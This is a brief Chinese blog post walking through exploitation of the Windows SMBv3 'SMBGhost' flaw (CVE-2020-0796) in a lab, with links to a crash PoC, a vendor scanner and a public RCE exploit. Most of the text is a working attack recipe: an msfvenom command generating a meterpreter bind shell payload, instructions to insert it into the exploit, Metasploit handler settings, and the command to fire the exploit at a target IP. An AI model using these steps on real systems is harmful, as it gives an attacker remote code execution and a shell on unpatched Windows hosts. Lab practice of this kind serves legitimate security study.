Windows SMBv3 蠕虫级RCE漏洞(CVE-2020-

2020-06-06  本文已影响0人  migrate_

测试环境及工具

1.jpg 2.jpg
靶机下载地址:
ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|
蓝屏的poc
https://github.com/eerykitty/CVE-2020-0796-PoC
奇安信的检查工具 地址http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
本次利用的脚本https://github.com/chompie1337/SMBGhost_RCE_PoC.git
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=(kali ip) LPORT=1234 -f py -o test.py
然后把生成的脚本内容替换到exploit的USER_PAYLOAD的内容
3.jpg 4.jpg 5.jpg
进入metasploit
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 1234
set rhost 192.168.1.107  (靶机IP)
show options 查看
exploit
运行
python3 exploit.py -ip  192.168.1.107
7.jpg
上一篇下一篇

猜你喜欢

热点阅读